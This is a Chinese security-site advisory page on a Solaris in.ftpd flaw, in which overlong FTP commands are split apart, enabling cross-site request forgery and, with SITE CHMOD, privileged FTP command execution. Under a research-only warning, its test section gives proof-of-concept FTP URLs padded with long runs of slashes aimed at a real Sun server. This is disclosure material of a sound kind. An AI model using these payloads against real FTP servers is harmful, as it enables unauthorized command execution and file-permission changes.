网通主站  |  电信镜像
软件下载 黑客软件 安全相关 动画教程 常用软件 杀毒专栏 最新更新 国外黑软 手机软件 股票软件
技术教程 新闻动态 黑客技术 安全漏洞 加密解密 安全防御 病毒资讯 技术文摘 网络杂文 以前教程
软件教程 黑软教程 安软教程 系统工具 网络工具 多媒体类 图形图像 联络聊天 实用工具

QQ 专 区

搜索

热门标签

返回首页
当前位置: 主页 > 安全漏洞 > SunOS >

Sun Solaris in.ftpd服务超长命令处理跨站请求伪造漏洞

受影响系统: Sun Solaris 10.0_x86 Sun Solaris 10.0 Sun OpenSolaris 2009.06 描述: BUGTRAQID: 40320 Solaris是一款由Sun开发和维护的商业UNIX操作系统。 Solaris操作系统所使用的in.ftpd服务在将用户所提交的超长FTP命令拆分为多个命令时存在跨站请求伪

  

受影响系统:

Sun Solaris 10.0_x86
Sun Solaris 10.0
Sun OpenSolaris 2009.06

描述:

BUGTRAQ  ID: 40320

Solaris是一款由Sun开发和维护的商业UNIX操作系统。

Solaris操作系统所使用的in.ftpd服务在将用户所提交的超长FTP命令拆分为多个命令时存在跨站请求伪造漏洞。如果再结合SITE CHMOD命令更改文件权限,攻击者就可以以管理权限执行任意FTP命令。

<*来源:Maksymilian Arciemowicz (max@jestsuper.pl)
  
  链接:http://securityreason.com/achievement_securityalert/84
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

 

ftp://ftp.sun.com//////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////stat


ftp://ftp.sun.com//////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////////

 
------分隔线----------------------------
收藏到:
热点内容

Copyright © 2002-2009 黑白网络 版权所有
辽ICP备05006163号